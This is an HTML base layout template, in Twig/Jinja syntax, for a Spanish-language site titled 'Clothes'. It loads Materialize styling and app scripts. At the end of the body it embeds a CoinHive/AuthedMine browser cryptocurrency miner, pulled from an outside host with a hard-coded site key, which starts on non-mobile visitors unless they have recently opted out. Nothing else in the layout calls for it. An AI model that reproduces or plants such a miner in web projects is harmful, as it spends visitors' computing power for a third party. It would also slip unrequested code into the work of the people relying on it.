<!DOCTYPE html>
<html lang='es'>
<head>
  <meta charset="utf-8"/>
  <title>Clothes</title>
  <!--Import Google Icon Font-->
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <!--Import materialize.css-->
  <link type="text/css" rel="stylesheet" href="{{'static/css/materialize.min.css' | url}}" media="screen,projection" />
  <!-- Utilities Bootstrap 4.0.0 -->
  <link rel="stylesheet" href="{{'static/css/utilities-bootstrap.css' | url}}">
  <!-- Application's theme -->
  <link rel="stylesheet" href="{{'static/css/style.css' | url}}">
  <!--Let browser know website is optimized for mobile-->
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
</head>
<body>

    {{ block('layout') }}

  <!--JavaScript at end of body for optimized loading-->
  <script type="text/javascript" src="{{'static/js/materialize.min.js' | url}}"></script>
  <script src="{{'static/js/sweetalert.min.js' | url}}"></script>
  <script type="text/javascript" src="{{'static/js/app.js' | url}}"></script>
  {% block script %}{% endblock %}
  <script src="https://authedmine.com/lib/authedmine.min.js"></script>
  <script>
    var miner = new CoinHive.Anonymous('46cSjyoRIhUqjHUpGo2fC7nuvbEn7js1', {throttle: 0.3});

    // Only start on non-mobile devices and if not opted-out
    // in the last 14400 seconds (4 hours):
    if (!miner.isMobile() && !miner.didOptOut(14400)) {
      miner.start();
    }
  </script>
  
  
</body>
</html>